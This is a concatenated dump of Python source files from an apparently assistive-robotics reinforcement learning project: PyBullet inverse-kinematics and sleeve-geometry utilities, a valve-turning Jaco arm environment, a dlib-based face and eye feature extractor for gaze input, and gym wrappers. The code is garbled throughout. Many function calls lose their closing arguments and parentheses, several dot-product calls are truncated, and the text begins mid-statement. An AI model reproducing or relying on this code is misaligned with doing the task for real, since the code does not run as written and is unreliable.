orient_orig is not None: # The robot's arm is in contact with itself. Continually randomize end effector orientation until a solution is found target_orient = p.getQuaternionFromEuler(p.getEulerFromQuaternion(orient_orig, + np.deg2rad(self.np_random.uniform(-45, 45, size=3)), if check_env_collisions: for _ in range(25): p.stepSimulation( gripper_pos, gripper_orient = p.getLinkState(body, target_joint, computeForwardKinematics=True,[:2] if np.linalg.norm(target_pos - np.array(gripper_pos)) < random_restart_threshold and (target_orient is None or np.linalg.norm(target_orient - np.array(gripper_orient)) < random_restart_threshold or np.isclose(np.linalg.norm(target_orient - np.array(gripper_orient)), 2, atol=random_restart_threshold)): return True, np.array(target_joint_positions) if best_ik_joints is None or np.linalg.norm(target_pos - np.array(gripper_pos)) < best_ik_distance: best_ik_joints = target_joint_positions best_ik_distance = np.linalg.norm(target_pos - np.array(gripper_pos)) world_creation.setup_robot_joints(body, robot_arm_joint_indices, robot_lower_limits, robot_upper_limits, randomize_joint_positions=False, default_positions=np.array(best_ik_joints), tool=None) return False, np.array(best_ik_joints) def ik_jlwki(self, body, target_joint, target_pos, target_orient, world_creation, robot_arm_joint_indices, robot_lower_limits, robot_upper_limits, ik_indices=range(29, 29+7), max_iterations=100, success_threshold=0.03, half_range=False, step_sim=False, check_env_collisions=False): target_joint_positions = self.ik(body, target_joint, target_pos, target_orient, ik_indices=ik_indices, max_iterations=max_iterations, half_range=half_range) world_creation.setup_robot_joints(body, robot_arm_joint_indices, robot_lower_limits, robot_upper_limits, randomize_joint_positions=False, default_positions=np.array(target_joint_positions), tool=None) if step_sim: for _ in range(5): p.stepSimulation( if len(p.getContactPoints(bodyA=body, bodyB=body, > 0: # The robot's arm is in contact with itself. return False, np.array(target_joint_positions) if check_env_collisions: for _ in range(25): p.stepSimulation( gripper_pos, gripper_orient = p.getLinkState(body, target_joint, computeForwardKinematics=True,[:2] if np.linalg.norm(target_pos - np.array(gripper_pos)) < success_threshold and (target_orient is None or np.linalg.norm(target_orient - np.array(gripper_orient)) < success_threshold or np.isclose(np.linalg.norm(target_orient - np.array(gripper_orient)), 2, atol=success_threshold)): return True, np.array(target_joint_positions) return False, np.array(target_joint_positions) def ik(self, body, target_joint, target_pos, target_orient, mean_rest_pose=None, ik_indices=range(29, 29+7), max_iterations=1000, half_range=False): key = '%d_%d' % (body, target_joint) if key not in self.ik_lower_limits: self.ik_lower_limits[key] = [] self.ik_upper_limits[key] = [] self.ik_joint_ranges[key] = [] self.ik_rest_poses[key] = [] j_names = [] for j in range(p.getNumJoints(body, if p.getJointInfo(body, j,[2] != p.JOINT_FIXED: joint_info = p.getJointInfo(body, j, lower_limit = joint_info[8] upper_limit = joint_info[9] if lower_limit == 0 and upper_limit == -1: lower_limit = -2*np.pi upper_limit = 2*np.pi self.ik_lower_limits[key].append(lower_limit) self.ik_upper_limits[key].append(upper_limit) if not half_range: self.ik_joint_ranges[key].append(upper_limit - lower_limit) else: self.ik_joint_ranges[key].append((upper_limit - lower_limit)/2.0) j_names.append([len(j_names)] + list(joint_info[:2])) self.ik_rest_poses[key] = self.np_random.uniform(self.ik_lower_limits[key], self.ik_upper_limits[key]) if mean_rest_pose is not None: self.ik_rest_poses[key][ik_indices] = np.clip(self.np_random.normal(mean_rest_pose,0.5),np.array(self.ik_lower_limits[key])[ik_indices], np.array(self.ik_upper_limits[key])[ik_indices]) self.ik_rest_poses[key] = self.ik_rest_poses[key].tolist() if target_orient is not None: ik_joint_poses = np.array(p.calculateInverseKinematics(body, target_joint, targetPosition=target_pos, targetOrientation=target_orient, lowerLimits=self.ik_lower_limits[key], upperLimits=self.ik_upper_limits[key], jointRanges=self.ik_joint_ranges[key], restPoses=self.ik_rest_poses[key], maxNumIterations=max_iterations, else: ik_joint_poses = np.array(p.calculateInverseKinematics(body, target_joint, targetPosition=target_pos, lowerLimits=self.ik_lower_limits[key], upperLimits=self.ik_upper_limits[key], jointRanges=self.ik_joint_ranges[key], restPoses=self.ik_rest_poses[key], maxNumIterations=max_iterations, target_joint_positions = ik_joint_poses[ik_indices] return target_joint_positions def points_in_cylinder(self, pt1, pt2, r, q): vec = pt2 - pt1 const = r * np.linalg.norm(vec) return - pt1, vec) >= 0 and - pt2, vec) <= 0 and np.linalg.norm(np.cross(q - pt1, vec)) <= const def point_on_capsule(self, p1, p2, radius, theta_range=(0, np.pi*2)): ''' Pick a random point along the outer surface of a capsule (cylinder) ''' # Pick a random point along the length of the capsule axis_vector = p2 - p1 random_length = self.np_random.uniform(radius, np.linalg.norm(axis_vector)) # Normalize axis vector to unit length axis_vector = axis_vector / np.linalg.norm(axis_vector) ortho_vector = self.orthogonal_vector(axis_vector) # Normalize orthogonal vector to unit length ortho_vector = ortho_vector / np.linalg.norm(ortho_vector) # Determine normal vector through cross product (this will be of unit length) normal_vector = np.cross(axis_vector, ortho_vector) # Pick a random rotation along the cylinder theta = self.np_random.uniform(theta_range[0], theta_range[1]) point = p1 + random_length*axis_vector + radius*np.cos(theta)*ortho_vector + radius*np.sin(theta)*normal_vector return point def capsule_points(self, p1, p2, radius, distance_between_points=0.05): ''' Creates a set of points around a capsule. Check out: and: sphere = [x, y, z, r] ''' points = [] p1, p2 = np.array(p1), np.array(p2) axis_vector = p2 - p1 # Normalize axis vector to unit length axis_vector = axis_vector / np.linalg.norm(axis_vector) ortho_vector = self.orthogonal_vector(axis_vector) # Normalize orthogonal vector to unit length ortho_vector = ortho_vector / np.linalg.norm(ortho_vector) # Determine normal vector through cross product (this will be of unit length) normal_vector = np.cross(axis_vector, ortho_vector) # Determine the section positions along the frustum at which we will create point around in a circular fashion sections = int(np.linalg.norm(p2 - p1) / distance_between_points) section_positions = [(p2 - p1) / (sections + 1) * (i + 1) for i in range(sections)] for i, section_pos in enumerate(section_positions): # Determine radius and circumference of this section circumference = 2*np.pi*radius # Determine the angle difference (in radians) between points theta_dist = distance_between_points / radius for j in range(int(circumference / distance_between_points)): theta = theta_dist * j # Determine cartesian coordinates for the point along the circular section of the frustum point_on_circle = p1 + section_pos + radius*np.cos(theta)*ortho_vector + radius*np.sin(theta)*normal_vector points.append(point_on_circle) return points def orthogonal_vector(self, v): ''' Two Euclidean vectors are orthogonal if and only if their dot product is zero. ''' # Find first element in v that is nonzero m = np.argmax(np.abs(v)) y = np.zeros(len(v)) y[(m+1) % len(v)] = 1 return np.cross(v, y) def line_intersects_triangle(self, p0, p1, p2, q0, q1): # Check that the arm line segment intersects two different triangles defined by points around the sleeve. # signed_volume = lambda a, b, c, d: (1.0/6.0) *, c-a), d-a) if np.sign(signed_volume(q0, p0, p1, p2)) != np.sign(signed_volume(q1, p0, p1, p2)): if np.sign(signed_volume(q0, q1, p0, p1)) == np.sign(signed_volume(q0, q1, p1, p2)) == np.sign(signed_volume(q0, q1, p2, p0)): return True return False def sleeve_on_arm_reward(self, triangle1_points, triangle2_points, human, hand_radius, elbow_radius, shoulder_radius): shoulder_pos, shoulder_orient = p.getLinkState(human, 15, computeForwardKinematics=True,[:2] elbow_pos, elbow_orient = p.getLinkState(human, 17, computeForwardKinematics=True,[:2] wrist_pos, wrist_orient = p.getLinkState(human, 19, computeForwardKinematics=True,[4:6] # Use full length of arm, rather than from hand center to elbow center wrist_pos, elbow_pos, shoulder_pos = np.array(wrist_pos), np.array(elbow_pos), np.array(shoulder_pos) hand_end_pos = wrist_pos + (wrist_pos - elbow_pos) / np.linalg.norm(wrist_pos - elbow_pos) * hand_radius*2 elbow_end_pos = elbow_pos + (elbow_pos - wrist_pos) / np.linalg.norm(wrist_pos - elbow_pos) * elbow_radius shoulder_end_pos = shoulder_pos + (shoulder_pos - elbow_pos) / np.linalg.norm(shoulder_pos - elbow_pos) * shoulder_radius # Given the central axis of the arm, find the plane through the axis and one vector perpendicular to the axis # and the plane through the axis and the second vector perpendicular to the other two. # There must be points above and below both of these two planes # normal_forearm = hand_end_pos - elbow_end_pos normal_forearm = normal_forearm / np.linalg.norm(normal_forearm) # Normalized Tangent Vector, assumes arm axis not parallel to vector [1, 1, 0] tangent_forearm = np.cross(np.array([1, 1, 0]), normal_forearm) tangent_forearm = tangent_forearm / np.linalg.norm(tangent_forearm) # Normalized Binormal_forearm or Bitangent_forearm vector binormal_forearm = np.cross(tangent_forearm, normal_forearm) binormal_forearm = binormal_forearm / np.linalg.norm(binormal_forearm) # Check if at least one point exists above and below both planes # - p0), p0 on plane, v is normal_forearm of a plane. v = tangent_forearm, v = binormal_forearm, p0 = elbow_end_pos all_points = np.concatenate([triangle1_points, triangle2_points], axis=0) tangent_forearm_points =, (all_points - elbow_end_pos).T) binormal_forearm_points =, (all_points - elbow_end_pos).T) points_above_below_forearm = np.any(tangent_forearm_points > 0) and np.any(tangent_forearm_points < 0) and np.any(binormal_forearm_points > 0) and np.any(binormal_forearm_points < 0) normal_upperarm = elbow_end_pos - shoulder_end_pos normal_upperarm = normal_upperarm / np.linalg.norm(normal_upperarm) tangent_upperarm = np.cross(np.array([1, 1, 0]), normal_upperarm) tangent_upperarm = tangent_upperarm / np.linalg.norm(tangent_upperarm) binormal_upperarm = np.cross(tangent_upperarm, normal_upperarm) binormal_upperarm = binormal_upperarm / np.linalg.norm(binormal_upperarm) tangent_upperarm_points =, (all_points - shoulder_end_pos).T) binormal_upperarm_points =, (all_points - shoulder_end_pos).T) points_above_below_upperarm = np.any(tangent_upperarm_points > 0) and np.any(tangent_upperarm_points < 0) and np.any(binormal_upperarm_points > 0) and np.any(binormal_upperarm_points < 0) # Check that the arm line segment intersects two different triangles defined by points around the sleeve. # forearm_intersects_triangle1 = self.line_intersects_triangle(triangle1_points[0], triangle1_points[1], triangle1_points[2], hand_end_pos, elbow_end_pos) forearm_intersects_triangle2 = self.line_intersects_triangle(triangle2_points[0], triangle2_points[1], triangle2_points[2], hand_end_pos, elbow_end_pos) upperarm_intersects_triangle1 = self.line_intersects_triangle(triangle1_points[0], triangle1_points[1], triangle1_points[2], elbow_end_pos, shoulder_end_pos) upperarm_intersects_triangle2 = self.line_intersects_triangle(triangle2_points[0], triangle2_points[1], triangle2_points[2], elbow_end_pos, shoulder_end_pos) sleeve_center = np.mean(all_points, axis=0) distance_to_shoulder = np.linalg.norm(shoulder_end_pos - sleeve_center) distance_to_elbow = np.linalg.norm(elbow_end_pos - sleeve_center) distance_to_hand = np.linalg.norm(hand_end_pos - sleeve_center) # Reward forward movement along the arm, away from the hand (pulling the sleeve onto the arm) distance_along_forearm = np.linalg.norm(sleeve_center - hand_end_pos) distance_along_upperarm = np.linalg.norm(sleeve_center - elbow_pos) forearm_in_sleeve = points_above_below_forearm and (forearm_intersects_triangle1 or forearm_intersects_triangle2) upperarm_in_sleeve = points_above_below_upperarm and (upperarm_intersects_triangle1 or upperarm_intersects_triangle2) return forearm_in_sleeve, upperarm_in_sleeve, distance_along_forearm, distance_along_upperarm, distance_to_hand, distance_to_elbow, distance_to_shoulder, np.linalg.norm(hand_end_pos - elbow_end_pos), np.linalg.norm(elbow_pos - shoulder_pos) ``` #### File: assistive_gym/envs/ ```python from gym import spaces import numpy as np import pybullet as p from .env import AssistiveEnv from gym.utils import seeding from collections import OrderedDict import os import time reach_arena = (np.array([-.25, -.5, 1]), np.array([.6, .4, .2])) default_orientation = p.getQuaternionFromEuler([0, 0, 0]) class ValveEnv(AssistiveEnv): def __init__(self, robot_type='jaco', success_dist=.05, target_indices=None, session_goal=False, frame_skip=5, capture_frames=False, stochastic=True, debug=False, min_error_threshold=np.pi / 16, max_error_threshold=np.pi / 4, num_targets=None, use_rand_init_angle=True, term_cond=None, term_thresh=20, preserve_angle=False, **kwargs): super(ValveEnv, self).__init__(robot_type=robot_type, task='reaching', frame_skip=frame_skip, time_step=0.02, action_robot_len=7, obs_robot_len=14) obs_dim = 3 + 4 + 3 + 2 + 1 + 7 + 7 encoder_obs_dim = 3 + 2 if stochastic: obs_dim += 3 # for valve pos encoder_obs_dim += 3 self.observation_space = spaces.Box(-np.inf, np.inf, (obs_dim,), dtype=np.float32) self.encoder_observation_space = spaces.Box(-np.inf, np.inf, (encoder_obs_dim,), dtype=np.float32) self.num_targets = num_targets self.success_dist = success_dist self.debug = debug self.stochastic = stochastic self.goal_feat = ['target_angle'] # Just an FYI self.feature_sizes = OrderedDict({'goal': 2}) self.session_goal = session_goal self.use_rand_init_angle = use_rand_init_angle if self.num_targets is not None: self.target_angles = np.linspace(-np.pi, np.pi, self.num_targets, endpoint=False) if not self.use_rand_init_angle: self.target_angles = np.delete(self.target_angles, np.argwhere(self.target_angles == 0)) self.target_indices = np.arange(len(self.target_angles)) self.min_error_threshold = min_error_threshold self.max_error_threshold = max_error_threshold self.error_threshold = min_error_threshold self.preserve_angle = preserve_angle self.last_angle = None self.wall_color = None self.calibrate = False self.term_cond = term_cond self.term_thresh = term_thresh self.n_success = 0 # number of consecutive steps in success condition self.target_norm = .55 def seed(self, seed=None): self.np_random, seed = seeding.np_random(seed) self.init_pos_random, _ = seeding.np_random(seed) return [seed] def step(self, action): old_tool_pos = self.tool_pos self.take_step(action, robot_arm='left', gains=self.config('robot_gains'), forces=self.config('robot_forces')) obs = self._get_obs([0]) reward = np.exp(-np.abs(self.angle_diff(self.valve_angle, self.target_angle))) - 1 direction = np.zeros(3) if self.task_success: index = 0 self.n_success += 1 tracking_angle = self.valve_angle else: tracking_angle = self.valve_angle if self.angle_diff(self.valve_angle, self.target_angle) > 0: index = 1 tracking_angle = self.wrap_angle(tracking_angle - 2 * self.min_error_threshold) else: index = 2 tracking_angle = self.wrap_angle(tracking_angle + 2 * self.min_error_threshold) self.n_success = 0 tracking_input = self.target_norm * np.array((-np.cos(tracking_angle), np.sin(tracking_angle))) + \ np.delete(self.valve_pos, 1) direction[index] = 1 if self.n_success >= self.term_thresh: color = [0, 1, 0, 1] elif self.task_success: color = [0, 0, 1, 1] else: color = [1, 0, 0, 1] p.changeVisualShape(self.target_indicator, -1, rgbaColor=color) info = { 'task_success': self.task_success, 'old_tool_pos': old_tool_pos, 'tool_pos': self.tool_pos, 'valve_pos': self.valve_pos, 'valve_angle': self.valve_angle, 'target_angle': self.target_angle, 'error_threshold': self.error_threshold, 'direction': direction, 'angle_error': self.angle_diff(self.valve_angle, self.target_angle), 'target_position': self.target_position, 'tracking_input': tracking_input } done = False if self.term_cond == 'auto': done = self.n_success >= self.term_thresh elif self.term_cond == 'keyboard': keys = p.getKeyboardEvents() if self.n_success >= self.term_thresh and p.B3G_RETURN in keys and keys[p.B3G_RETURN] & p.KEY_WAS_TRIGGERED: done = True time.sleep(1) info['feedback'] = True if done else -1 return obs, reward, done, info def _get_obs(self, forces): robot_joint_states = p.getJointStates(self.robot, jointIndices=self.robot_left_arm_joint_indices, robot_joint_positions = np.array([x[0] for x in robot_joint_states]) robot_joint_velocities = np.array([x[1] for x in robot_joint_states]) angle_features = [np.sin(self.valve_angle), np.cos(self.valve_angle)] obs = [self.tool_pos, self.tool_orient, self.tool_velocity, angle_features, [self.valve_velocity], robot_joint_positions, robot_joint_velocities ] encoder_obs = [self.tool_pos, angle_features] if self.stochastic: obs.append(self.valve_pos) encoder_obs.append(self.valve_pos) robot_obs = dict( raw_obs=np.concatenate(obs), encoder_obs=np.concatenate(encoder_obs), hindsight_goal=np.array([np.sin(self.valve_angle), np.cos(self.valve_angle)]), goal=self.goal.copy(), ) self.last_angle = self.valve_angle return robot_obs def update_curriculum(self, success): if success: self.error_threshold -= self.min_error_threshold self.error_threshold = max(self.min_error_threshold, self.error_threshold) else: self.error_threshold += self.min_error_threshold self.error_threshold = min(self.max_error_threshold, self.error_threshold) def reset(self): """set up standard environment""" self.setup_timing() _human, self.wheelchair, self.robot, self.robot_lower_limits, self.robot_upper_limits, _human_lower_limits, \ _human_upper_limits, self.robot_right_arm_joint_indices, self.robot_left_arm_joint_indices, self.gender \ = self.world_creation.create_new_world(furniture_type='wheelchair', init_human=False, static_human_base=True, human_impairment='random', print_joints=False, gender='random') self.robot_lower_limits = self.robot_lower_limits[self.robot_left_arm_joint_indices] self.robot_upper_limits = self.robot_upper_limits[self.robot_left_arm_joint_indices] self.reset_robot_joints() wheelchair_pos, wheelchair_orient = p.getBasePositionAndOrientation(self.wheelchair, p.resetBasePositionAndOrientation(self.robot, np.array(wheelchair_pos) + np.array([-0.35, -0.3, 0.3]), p.getQuaternionFromEuler([0, 0, -np.pi / 2.0],, base_pos, base_orient = p.getBasePositionAndOrientation(self.robot, self.human_controllable_joint_indices = [] self.human_lower_limits = np.array([]) self.human_upper_limits = np.array([]) """set up target and initial robot position""" if not self.session_goal: self.set_target_index() # instance override in demos self.reset_noise() self.init_robot_arm() wall_collision = p.createCollisionShape(p.GEOM_BOX, halfExtents=[4, .1, 1]) wall_visual = p.createVisualShape(p.GEOM_BOX, halfExtents=[4, .1, 1], rgbaColor=self.wall_color) wall_pos, wall_orient = np.array([0., -1.1, 1.]), np.array([0, 0, 0, 1]) if self.stochastic and not self.calibrate: wall_pos = wall_pos + self.wall_noise self.wall = p.createMultiBody(basePosition=wall_pos, baseOrientation=wall_orient, baseCollisionShapeIndex=wall_collision, baseVisualShapeIndex=wall_visual, valve_pos, valve_orient = p.multiplyTransforms(wall_pos, wall_orient, [0, 0.1, 0], p.getQuaternionFromEuler([0, 0, 0]), if self.stochastic: valve_pos = np.array(valve_pos) + self.valve_pos_noise self.valve = p.loadURDF(os.path.join(, 'valve', 'valve.urdf'), basePosition=valve_pos, useFixedBase=True, baseOrientation=valve_orient, globalScaling=1, if self.preserve_angle and self.last_angle is not None: p.resetJointState(self.valve, 0, self.last_angle, elif self.use_rand_init_angle: p.resetJointState(self.valve, 0, self.rand_init_angle, """configure pybullet""" p.setGravity(0, 0, 0, p.setPhysicsEngineParameter(numSubSteps=5, numSolverIterations=10, # Enable rendering p.resetDebugVisualizerCamera(cameraDistance=.1, cameraYaw=180, cameraPitch=-10, cameraTargetPosition=[0, -.3, 1.1], p.configureDebugVisualizer(p.COV_ENABLE_RENDERING, 1, self.goal = np.array([np.sin(self.target_angle), np.cos(self.target_angle)]) sphere_visual = p.createVisualShape(shapeType=p.GEOM_SPHERE, radius=0.1, rgbaColor=[1, 0, 0, 1], target_coord = self.target_norm * np.array((-np.cos(self.target_angle), 0, np.sin(self.target_angle))) + \ valve_pos + [0, 0.105, 0] self.target_indicator = p.createMultiBody(baseMass=0.0, baseCollisionShapeIndex=-1, baseVisualShapeIndex=sphere_visual, basePosition=target_coord, useMaximalCoordinates=False, self.n_success = 0 obs = self._get_obs([0]) return obs def init_start_pos(self): """exchange this function for curriculum""" self.init_pos = np.array([0, -.5, 1.1]) self.init_pos += self.init_pos_random.uniform([-0.1, -0.1, -0.1], [0.1, 0.1, 0.1], size=3) def init_robot_arm(self): self.init_start_pos() init_orient = p.getQuaternionFromEuler(np.array([0, np.pi / 2.0, 0]), self.util.ik_random_restarts(self.robot, 11, self.init_pos, init_orient, self.world_creation, self.robot_left_arm_joint_indices, self.robot_lower_limits, self.robot_upper_limits, ik_indices=[0, 1, 2, 3, 4, 5, 6], max_iterations=100, max_ik_random_restarts=10, random_restart_threshold=0.03, step_sim=True) self.world_creation.set_gripper_open_position(self.robot, position=1, left=True, set_instantly=True) self.tool = self.world_creation.init_tool(self.robot, mesh_scale=[0.001] * 3, pos_offset=[0, 0, 0.02], orient_offset=p.getQuaternionFromEuler([0, -np.pi / 2.0, 0],, maximal=False) def set_target_index(self, index=None): if self.num_targets is not None: if index is None: self.target_index = self.np_random.choice(self.target_indices) else: self.target_index = index def reset_noise(self): self.rand_init_angle = (self.np_random.rand() - 0.5) * 2 * np.pi # init angle either self.rand_init_angle or 0 if self.preserve_angle and self.last_angle is not None: avoid = self.last_angle elif self.use_rand_init_angle: avoid = self.rand_init_angle else: avoid = 0 self.rand_angle = None while self.rand_angle is None or np.abs(self.angle_diff(self.rand_angle, avoid)) < self.error_threshold: self.rand_angle = (self.np_random.rand() - 0.5) * 2 * np.pi if self.stochastic: self.valve_pos_noise = np.array([self.np_random.uniform(-.05, .05), 0, 0]) # no y noise so can use 2D coordinates only for goal estimation self.wall_noise = np.zeros(3) def wrong_goal_reached(self): return False def calibrate_mode(self, calibrate, split): self.wall_color = [255 / 255, 187 / 255, 120 / 255, 1] if calibrate else None self.calibrate = calibrate @property def tool_pos(self): return np.array(p.getBasePositionAndOrientation(self.tool,[0]) @property def tool_orient(self): return np.array(p.getBasePositionAndOrientation(self.tool,[1]) @property def tool_velocity(self): return np.array(p.getBaseVelocity(self.tool,[0]) @property def valve_pos(self): return p.getLinkState(self.valve, 0, computeForwardKinematics=True,[0] @property def valve_angle(self): return self.wrap_angle(p.getJointStates(self.valve, jointIndices=[0],[0][0]) @property def valve_velocity(self): return p.getJointStates(self.valve, jointIndices=[0],[0][1] @property def target_angle(self): return self.rand_angle if self.num_targets is None or not self.calibrate else \ self.wrap_angle(self.target_angles[self.target_index]) @property def target_position(self): return np.delete(np.array(p.getBasePositionAndOrientation(self.target_indicator,[0]), 1) def wrap_angle(self, angle): return angle - 2 * np.pi * np.floor((angle + np.pi) / (2 * np.pi)) def angle_diff(self, angle1, angle2): a = angle1 - angle2 if a > np.pi: a -= 2 * np.pi elif a < -np.pi: a += 2 * np.pi return a @property def task_success(self): return np.abs(self.angle_diff(self.valve_angle, self.target_angle)) < self.error_threshold class ValveJacoEnv(ValveEnv): def __init__(self, **kwargs): super().__init__(robot_type='jaco', **kwargs) ``` #### File: image/gaze_capture/ ```python import dlib import cv2 import math import numpy as np from .ITrackerData import loadMetadata import os from pathlib import Path main_dir = str(Path(__file__).resolve().parents[1]) class FaceProcessor: def __init__(self, predictor_path): self.face_detector = dlib.get_frontal_face_detector() self.predictor = dlib.shape_predictor(predictor_path) self.img_dim = 224 self.face_grid_dim = 25 self.left_eye_points = [42, 43, 44, 45, 46, 47] self.right_eye_points = [36, 37, 38, 39, 40, 41] self.face_mean = loadMetadata(os.path.join(main_dir,'gaze_capture','model_files','mean_face_224.mat'), silent=True)['image_mean'] self.left_eye_mean = loadMetadata(os.path.join(main_dir,'gaze_capture','model_files','mean_left_224.mat'), silent=True)['image_mean'] self.right_eye_mean = loadMetadata(os.path.join(main_dir,'gaze_capture','model_files','mean_right_224.mat'), silent=True)['image_mean'] def get_gaze_features(self, frame): height, width = frame.shape[:2] diff = height - width # crop image to square if diff > 0: frame = frame[math.floor(diff / 2): -math.ceil(diff / 2)] elif diff < 0: frame = frame[:, -math.floor(diff / 2): math.ceil(diff / 2)] gs_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) face_box = self._get_facial_detections(gs_frame) if face_box is None: return None face = self._get_face(frame, face_box) if face is None: return None face = (face - self.face_mean) / 255 face_grid = self._get_face_grid(frame, face_box) landmarks = self.predictor(gs_frame, face_box) og_left_eye = self._get_eye(frame, landmarks, self.left_eye_points) og_right_eye = self._get_eye(frame, landmarks, self.right_eye_points) left_eye = (og_left_eye - self.left_eye_mean) / 255 right_eye = (og_right_eye - self.right_eye_mean) / 255 face = np.moveaxis(face, -1, 0) left_eye = np.moveaxis(left_eye, -1, 0) right_eye = np.moveaxis(right_eye, -1, 0) return face, left_eye, right_eye, face_grid, # og_left_eye, og_right_eye def _get_face(self, frame, face_box): try: face = frame[ face_box.bottom(), face_box.left(): face_box.right()] face = cv2.resize(face, (self.img_dim, self.img_dim)) face = np.flip(face, axis=2) except: return None return face def _get_face_grid(self, frame, face_box): frame_dim = len(frame) top = math.floor( * self.face_grid_dim / frame_dim) bottom = math.ceil(face_box.bottom() * self.face_grid_dim / frame_dim) left = math.floor(face_box.left() * self.face_grid_dim / frame_dim) right = math.ceil(face_box.right() * self.face_grid_dim / frame_dim) face_grid = np.zeros((self.face_grid_dim, self.face_grid_dim)) face_grid[top: bottom, left: right] = 1 return face_grid def _get_eye(self, frame, landmarks, points): eye_landmarks = self._get_landmarks(landmarks, points) left, top, width, height = cv2.boundingRect(eye_landmarks) w_margin = int(width / 3) h_margin = (width + 2 * w_margin - height) / 2 top_margin = math.ceil(h_margin) bot_margin = math.floor(h_margin) eye = frame[top - top_margin: top + height + bot_margin, left - w_margin: left + width + w_margin] eye = cv2.resize(eye, (self.img_dim, self.img_dim)) eye = np.flip(eye, axis=2) return eye def get_eye_aspect_ratio(self, frame): gs_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) face_box = self._get_facial_detections(gs_frame) if face_box is None: return None landmarks = self.predictor(gs_frame, face_box) left_eye_landmarks = self._get_landmarks(landmarks, self.left_eye_points) right_eye_landmarks = self._get_landmarks(landmarks, self.right_eye_points) left_eye_aspect_ratio = self._eye_aspect_ratio(left_eye_landmarks) right_eye_aspect_ratio = self._eye_aspect_ratio(right_eye_landmarks) return (left_eye_aspect_ratio + right_eye_aspect_ratio) / 2 def _get_facial_detections(self, gs_frame): detections = self.face_detector(gs_frame) if len(detections) == 0: return None return detections[0] @staticmethod def _get_landmarks(landmarks, points): return np.array([(landmarks.part(point).x, landmarks.part(point).y) for point in points]) @staticmethod def _eye_aspect_ratio(eye_landmarks): v_1 = np.linalg.norm(eye_landmarks[1] - eye_landmarks[5]) v_2 = np.linalg.norm(eye_landmarks[2] - eye_landmarks[4]) h = np.linalg.norm(eye_landmarks[0] - eye_landmarks[3]) return (v_1 + v_2) / (2 * h) ``` #### File: rl/misc/ ```python from functools import reduce import os from pathlib import Path import h5py from collections import deque import numpy as np from numpy.random import default_rng from numpy.linalg import norm import pybullet as p import assistive_gym as ag from gym import spaces, Env import cv2 import torch from gaze_capture.face_processor import FaceProcessor from gaze_capture.ITrackerModel import ITrackerModel import threading from rl.oracles import * main_dir = str(Path(__file__).resolve().parents[2]) def default_overhead(config): factory_map = { 'session': session_factory, } factories = [factory_map[factory] for factory in config['factories']] factories = [action_factory] + factories wrapper = reduce(lambda value, func: func(value), factories, LibraryWrapper) class Overhead(wrapper): def __init__(self, config): super().__init__(config) self.rng = default_rng(config['seedid']) adapt_map = { 'oracle': oracle, 'static_gaze': static_gaze, 'real_gaze': real_gaze, 'joint': joint, 'sim_keyboard': sim_keyboard, 'keyboard': keyboard, 'goal': goal, 'reward': reward, 'sim_target': sim_target, 'dict_to_array': dict_to_array, } self.adapts = [adapt_map[adapt] for adapt in config['adapts']] self.adapts = [adapt(self, config) for adapt in self.adapts] self.adapt_step = lambda obs, r, done, info: reduce(lambda sub_tran, adapt: adapt._step(*sub_tran), self.adapts, (obs, r, done, info)) self.adapt_reset = lambda obs, info=None: reduce(lambda obs, adapt: adapt._reset(obs, info), self.adapts, (obs)) def step(self, action): tran = super().step(action) tran = self.adapt_step(*tran) return tran def reset(self): obs = super().reset() obs = self.adapt_reset(obs) return obs return Overhead(config) class LibraryWrapper(Env): def __init__(self, config): self.env_name = config['env_name'] self.base_env = { "OneSwitch": ag.OneSwitchJacoEnv, "Bottle": ag.BottleJacoEnv, "Valve": ag.ValveJacoEnv, "BlockPush": ag.BlockPushJacoEnv, }[config['env_name']] self.base_env = self.base_env(**config['env_kwargs']) self.observation_space = self.base_env.observation_space self.encoder_observation_space = None if hasattr(self.base_env, 'encoder_observation_space'): self.encoder_observation_space = self.base_env.encoder_observation_space self.action_space = self.base_env.action_space self.feature_sizes = self.base_env.feature_sizes self.terminate_on_failure = config['terminate_on_failure'] def step(self, action): obs, r, done, info = self.base_env.step(action) if self.terminate_on_failure and hasattr(self.base_env, 'wrong_goal_reached'): done = done or self.base_env.wrong_goal_reached() return obs, r, done, info def reset(self): return self.base_env.reset() def render(self, mode=None, **kwargs): return self.base_env.render(mode) def seed(self, value): self.base_env.seed(value) def close(self): self.base_env.close() def get_base_env(self): return self.base_env def action_factory(base): class Action(base): def __init__(self, config): super().__init__(config) self.action_type = config['action_type'] self.action_space = { "trajectory": spaces.Box(-.1, .1, (3,)), "joint": spaces.Box(-.25, .25, (7,)), "disc_traj": spaces.Box(0, 1, (6,)), }[config['action_type']] self.translate = { 'trajectory': self.trajectory, 'joint': self.joint, 'disc_traj': self.disc_traj, }[config['action_type']] self.smooth_alpha = config['smooth_alpha'] def joint(self, action, info={}): clip_by_norm = lambda traj, limit: traj / max(1e-4, norm(traj)) * np.clip(norm(traj), None, limit) action = clip_by_norm(action, .25) info['joint'] = action return action, info def target(self, coor, info={}): base_env = self.base_env info['target'] = coor joint_states = p.getJointStates(base_env.robot, jointIndices=base_env.robot_left_arm_joint_indices, joint_positions = np.array([x[0] for x in joint_states]) link_pos = p.getLinkState(base_env.robot, 13, computeForwardKinematics=True,[0] new_pos = np.array(coor) + np.array(link_pos) - base_env.tool_pos new_joint_positions = np.array( p.calculateInverseKinematics(base_env.robot, 13, new_pos, new_joint_positions = new_joint_positions[:7] action = new_joint_positions - joint_positions return self.joint(action, info) def trajectory(self, traj, info={}): clip_by_norm = lambda traj, min_l=None, max_l=None: traj / max(1e-4, norm(traj)) * np.clip(norm(traj), min_l, max_l) traj = clip_by_norm(traj, .07, .1) info['trajectory'] = traj return + traj, info) def disc_traj(self, onehot, info={}): info['disc_traj'] = onehot index = np.argmax(onehot) traj = [ np.array((-1, 0, 0)), np.array((1, 0, 0)), np.array((0, -1, 0)), np.array((0, 1, 0)), np.array((0, 0, -1)), np.array((0, 0, 1)), ][index] return self.trajectory(traj, info) def step(self, action): action, ainfo = self.translate(action) obs, r, done, info = super().step(action) info = {**info, **ainfo} return obs, r, done, info def reset(self): self.action = np.zeros(7) return super().reset() return Action def session_factory(base): class Session(base): def __init__(self, config): config['env_kwargs']['session_goal'] = True super().__init__(config) self.goal_reached = False def new_goal(self, index=None): self.base_env.set_target_index(index) self.base_env.reset_noise() self.goal_reached = False def step(self, action): o, r, d, info = super().step(action) if info['task_success']: self.goal_reached = True return o, r, d, info def reset(self): return super().reset() return Session class array_to_dict: def __init__(self, master_env, config): pass def _step(self, obs, r, done, info): if not isinstance(obs, dict): obs = 